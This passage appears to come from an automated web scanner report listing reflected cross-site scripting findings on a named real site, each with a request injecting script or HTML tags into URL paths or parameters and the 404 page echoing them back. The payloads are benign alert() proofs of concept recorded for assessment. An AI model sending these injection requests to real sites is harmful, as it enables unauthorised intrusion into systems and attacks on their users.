Path:	/resources-information/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 58482<script>alert(1)</script>865c3ad27e1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/images/folder.gif58482<script>alert(1)</script>865c3ad27e1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images/folder.gif58482<script>alert(1)</script>865c3ad27e1 was not found on this server.</p>
...[SNIP]...

2.4100. http://www.resellerbase.com/resources-information/themes/kosmos/images/folder.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/folder.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 73fef<script>alert(1)</script>7b4c78f8ed3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/images/folder.gif?73fef<script>alert(1)</script>7b4c78f8ed3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images/folder.gif?73fef<script>alert(1)</script>7b4c78f8ed3=1 was not found on this server.</p>
...[SNIP]...

2.4101. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98fff<script>alert(1)</script>10bf9093186 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information98fff<script>alert(1)</script>10bf9093186/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information98fff<script>alert(1)</script>10bf9093186/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4102. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9cdf<script>alert(1)</script>c7e3a3246ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themesf9cdf<script>alert(1)</script>c7e3a3246ad/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themesf9cdf<script>alert(1)</script>c7e3a3246ad/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4103. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 724ea<script>alert(1)</script>84f7647b980 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos724ea<script>alert(1)</script>84f7647b980/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos724ea<script>alert(1)</script>84f7647b980/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4104. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd43a<script>alert(1)</script>d1f061b18bf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/imagescd43a<script>alert(1)</script>d1f061b18bf/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/imagescd43a<script>alert(1)</script>d1f061b18bf/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4105. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ddefa<script>alert(1)</script>447f8e4e48b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/images/search.phpddefa<script>alert(1)</script>447f8e4e48b?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:54:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images/search.phpddefa<script>alert(1)</script>447f8e4e48b?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4106. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 8eaf8<a>31d7cb5b8cc was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/themes/kosmos/images/search.php?keyword=search...&Submit3=Search8eaf8<a>31d7cb5b8cc&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images/search.php?keyword=search...&Submit3=Search8eaf8<a>31d7cb5b8cc&opt=2 was not found on this server.</p>
...[SNIP]...

2.4107. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload eeaf8<a>f0695a052 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/themes/kosmos/images/search.php?keyword=search...eeaf8<a>f0695a052&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images/search.php?keyword=search...eeaf8<a>f0695a052&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4108. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9007e<script>alert(1)</script>894793f5caf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&9007e<script>alert(1)</script>894793f5caf=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&9007e<script>alert(1)</script>894793f5caf=1 was not found on this server.</p>
...[SNIP]...

2.4109. http://www.resellerbase.com/resources-information/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6b644<a>93de07554aa was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=26b644<a>93de07554aa HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=26b644<a>93de07554aa was not found on this server.</p>
...[SNIP]...

2.4110. http://www.resellerbase.com/resources-information/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d4697<script>alert(1)</script>e8dd8ceb3ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-informationd4697<script>alert(1)</script>e8dd8ceb3ff/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-informationd4697<script>alert(1)</script>e8dd8ceb3ff/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4111. http://www.resellerbase.com/resources-information/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2f4f6<script>alert(1)</script>9b6549ea7a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes2f4f6<script>alert(1)</script>9b6549ea7a4/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes2f4f6<script>alert(1)</script>9b6549ea7a4/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4112. http://www.resellerbase.com/resources-information/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f4bb7<script>alert(1)</script>e4252ba3c8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmosf4bb7<script>alert(1)</script>e4252ba3c8e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:54:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmosf4bb7<script>alert(1)</script>e4252ba3c8e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4113. http://www.resellerbase.com/resources-information/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 924e6<script>alert(1)</script>c9e64707c87 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/search.php924e6<script>alert(1)</script>c9e64707c87?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:54:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/search.php924e6<script>alert(1)</script>c9e64707c87?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4114. http://www.resellerbase.com/resources-information/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload a4d37<a>827316afbe was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/themes/kosmos/search.php?keyword=search...&Submit3=Searcha4d37<a>827316afbe&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/search.php?keyword=search...&Submit3=Searcha4d37<a>827316afbe&opt=2 was not found on this server.</p>
...[SNIP]...

2.4115. http://www.resellerbase.com/resources-information/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 8fbf1<a>0842804e886 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/themes/kosmos/search.php?keyword=search...8fbf1<a>0842804e886&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/search.php?keyword=search...8fbf1<a>0842804e886&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4116. http://www.resellerbase.com/resources-information/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5c533<script>alert(1)</script>f45bf6e4e70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&5c533<script>alert(1)</script>f45bf6e4e70=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&5c533<script>alert(1)</script>f45bf6e4e70=1 was not found on this server.</p>
...[SNIP]...

